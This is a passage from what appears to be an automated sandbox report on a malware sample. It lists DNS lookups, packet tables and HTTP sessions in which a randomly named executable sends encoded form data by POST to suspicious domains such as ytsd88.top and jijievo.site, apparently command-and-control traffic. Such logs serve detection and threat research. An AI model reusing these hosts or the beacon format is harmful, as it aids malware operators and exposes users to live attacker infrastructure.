                                                                    Jan 11, 2025 08:18:41.093058109 CET5000480192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.112834930 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.117789984 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.117929935 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.128494978 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.133369923 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.698919058 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.699007034 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:42.699337959 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.703228951 CET5000580192.168.2.7147.255.21.187
                                                                    Jan 11, 2025 08:18:42.708076000 CET8050005147.255.21.187192.168.2.7
                                                                    Jan 11, 2025 08:18:47.741822004 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.746681929 CET8050006104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:47.746750116 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.764175892 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:47.769011974 CET8050006104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:49.281776905 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:49.286823034 CET8050006104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:49.287600040 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.301573038 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.306442976 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:50.307586908 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.329575062 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.334388971 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:51.841588020 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:51.846554995 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:51.849575043 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.375397921 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.380248070 CET8050008104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:54.381594896 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.397610903 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.402543068 CET8050008104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:54.402580976 CET8050008104.21.42.77192.168.2.7

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 08:16:36.251415968 CET6184353192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:36.263565063 CET53618431.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:16:41.297271967 CET6316953192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:41.316077948 CET53631691.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:16:57.797619104 CET6342153192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:58.580473900 CET53634211.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:12.236537933 CET5781553192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:12.712079048 CET53578151.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:25.970402002 CET5733353192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:25.981236935 CET53573331.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:39.127638102 CET5724253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:39.393934011 CET53572421.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:53.033480883 CET5320153192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:53.716451883 CET53532011.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:07.486018896 CET5455253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:07.497442961 CET53545521.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:20.766062975 CET5567053192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:20.787755013 CET53556701.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:33.922687054 CET5539853192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:34.471565008 CET53553981.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:47.720594883 CET6533253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:47.739371061 CET53653321.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 08:16:36.251415968 CET192.168.2.71.1.1.10xb45eStandard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.297271967 CET192.168.2.71.1.1.10x93c7Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:57.797619104 CET192.168.2.71.1.1.10x9237Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:12.236537933 CET192.168.2.71.1.1.10x688fStandard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:25.970402002 CET192.168.2.71.1.1.10xa874Standard query (0)www.fortevision.xyzA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:39.127638102 CET192.168.2.71.1.1.10xbf7eStandard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:53.033480883 CET192.168.2.71.1.1.10x467bStandard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:07.486018896 CET192.168.2.71.1.1.10x7fefStandard query (0)www.connecty.liveA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:20.766062975 CET192.168.2.71.1.1.10x8b54Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:33.922687054 CET192.168.2.71.1.1.10x2789Standard query (0)www.50food.comA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:47.720594883 CET192.168.2.71.1.1.10xcc07Standard query (0)www.zriaraem-skiry.sbsA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 08:16:36.263565063 CET1.1.1.1192.168.2.70xb45eName error (3)www.grandesofertas.funnonenoneA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:41.316077948 CET1.1.1.1192.168.2.70x93c7No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:16:58.580473900 CET1.1.1.1192.168.2.70x9237No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:12.712079048 CET1.1.1.1192.168.2.70x688fNo error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:12.712079048 CET1.1.1.1192.168.2.70x688fNo error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:25.981236935 CET1.1.1.1192.168.2.70xa874No error (0)www.fortevision.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:25.981236935 CET1.1.1.1192.168.2.70xa874No error (0)www.fortevision.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:39.393934011 CET1.1.1.1192.168.2.70xbf7eNo error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:39.393934011 CET1.1.1.1192.168.2.70xbf7eNo error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:53.716451883 CET1.1.1.1192.168.2.70x467bNo error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 11, 2025 08:17:53.716451883 CET1.1.1.1192.168.2.70x467bNo error (0)ymx01.cn8.218.14.120A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:07.497442961 CET1.1.1.1192.168.2.70x7fefNo error (0)www.connecty.live203.161.43.228A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:20.787755013 CET1.1.1.1192.168.2.70x8b54No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:20.787755013 CET1.1.1.1192.168.2.70x8b54No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:34.471565008 CET1.1.1.1192.168.2.70x2789No error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:47.739371061 CET1.1.1.1192.168.2.70xcc07No error (0)www.zriaraem-skiry.sbs104.21.42.77A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:47.739371061 CET1.1.1.1192.168.2.70xcc07No error (0)www.zriaraem-skiry.sbs172.67.159.61A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.jijievo.site
                                                                    • www.ytsd88.top
                                                                    • www.bpgroup.site
                                                                    • www.fortevision.xyz
                                                                    • www.rtpterbaruwaktu3.xyz
                                                                    • www.prhmcjdz.tokyo
                                                                    • www.connecty.live
                                                                    • www.tals.xyz
                                                                    • www.50food.com
                                                                    • www.zriaraem-skiry.sbs

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.749972154.205.156.26806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:16:41.346120119 CET480OUTGET /z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.jijievo.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:16:42.756397963 CET197INHTTP/1.1 200 OK
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Sat, 11 Jan 2025 07:16:42 GMT
                                                                    Server: nginx
                                                                    Vary: Accept-Encoding
                                                                    Content-Length: 24
                                                                    Connection: close
                                                                    Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                    Data Ascii: Unable to get connection


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.74997347.76.213.197806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:16:58.633883953 CET729OUTPOST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 2b 43 65 42 58 6a 46 53 71 6e 63 35 65 37 70 42 78 44 30 66 5a 39 74 78 51 70 77 72 4b 66 55 43 4b 2f 38 47 30 70 66 61 50 43 77 70 48 59 70 62 67 3d 3d
                                                                    Data Ascii: QbUPL=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ff+CeBXjFSqnc5e7pBxD0fZ9txQpwrKfUCK/8G0pfaPCwpHYpbg==
                                                                    Jan 11, 2025 08:16:59.497067928 CET574INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:16:59 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.74997447.76.213.197806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:01.193464994 CET749OUTPOST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 46 57 31 53 4e 47 38 73 43 68 41 4c 37 6b 4c 57 64 2b 46 34 6e 61 6b 56 35 74 4e 5a 42 73 38 74 67 54 34 4c 7a 65 41 76 35 7a 46 6a 54 6a 44 7a 73 3d
                                                                    Data Ascii: QbUPL=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIFW1SNG8sChAL7kLWd+F4nakV5tNZBs8tgT4LzeAv5zFjTjDzs=
                                                                    Jan 11, 2025 08:17:02.077461958 CET574INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:01 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.74997647.76.213.197806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 08:17:03.739660025 CET1762OUTPOST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 62 49 31 73 37 4c 45 79 33 51 66 4c 70 32 70 68 39 55 72 4e 47 6e 4d 39 7a 5a 57 57 34 63 49 2f 58 37 2f 6d 74 48 42 39 73 65 6a 62 51 42 32 36 2f 31 50 4c 6b 69 5a 67 37 6f 51 6c 42 35 44 48 6b 42 41 6d 4d 65 69 62 32 4f 50 55 55 46 47 2b 79 6f 37 30 42 72 7a 6b 71 79 63 6f 53 47 44 50 6b 45 69 4b 54 75 64 73 68 34 47 4a 6e 6a 4a 48 65 46 54 34 72 48 51 6d 33 48 43 49 57 6d 62 72 30 4d 66 4e 59 62 79 66 51 56 56 67 6e 39 63 54 2f 41 6b 4a 42 32 46 6f 44 38 77 79 57 50 34 6f 77 4b [TRUNCATED]
                                                                    Data Ascii: QbUPL=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6drWC9I9Df8kmZTfRoycMVAEMv45Ce8UJJqCbZVhinQgX3LdjAHUwNIbRQSXZkEsXaUAfl2HdZXIlKSPBZAkNVJ+lDmqU+NgwcAjGLoNFcuWs2M8gOXXgrD3Rf+W1ImLuLYbI1s7LEy3QfLp2ph9UrNGnM9zZWW4cI/X7/mtHB9sejbQB26/1PLkiZg7oQlB5DHkBAmMeib2OPUUFG+yo70BrzkqycoSGDPkEiKTudsh4GJnjJHeFT4rHQm3HCIWmbr0MfNYbyfQVVgn9cT/AkJB2FoD8wyWP4owKL93oqKzPjQKjTFrieUzNFlPQQuatsRrn/sbjRHxGx/fhvY3W59e/piC7+NM4PsuVjRvWOjtMj6PFsDKcNVFSasa0Ve/J9mjRknhfqkh1CRlS7+ibQdzY6ssfMyndbPoapFGjc2iocmljsRV3kPx4kdDXBNtOSPGriGhi3HyGxLIwCGpt7QnC5z4RnJdVzEp94B3Z2VAQSxu/7dXQZOVhAERfNybp2l8V8DlMmzoMtBl79zFrPtn7CN5WVu04C3iyShJS42IgPgvatfT6A+aoJ+tk/vrl9jivR+/7lAUufUgZyQz31dYWm5srh5DLCOg8BsDsshWJxm9CSotuyHt/qcSKEKKhmrwSzw/uxqJ1fV8huX5dosa2aPZev88n72ldBCbG9YZqqTykQCo5MlZoZcZy43+ffF8p8azAWasaPlb99Jxr+z/ocVb4ZOQUPDd7h5QsOBb+3GaTCL72VGMdexuS9Md9RLM1PjiVq2MDPYV3RE5X/M7Zt64ekTNf3yM2H0c2jeP+lN0QEF494LIF1ZUEzShHrEWclesESTmY6Tei4T+hjbjs7p3f88gHIeEOGsMEgMoXu3FHE4T01clUuBwAEuy02tXMPHOSyX9EgSAPOCK5AGjtEKxt92UM6EtCCAHHJRSE0aUf296bocmLxCuL0/5jY39q2r [TRUNCATED]
                                                                    Jan 11, 2025 08:17:04.638664007 CET574INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:04 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.74997747.76.213.197806908C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    TimestampBytes transferredDirectionData
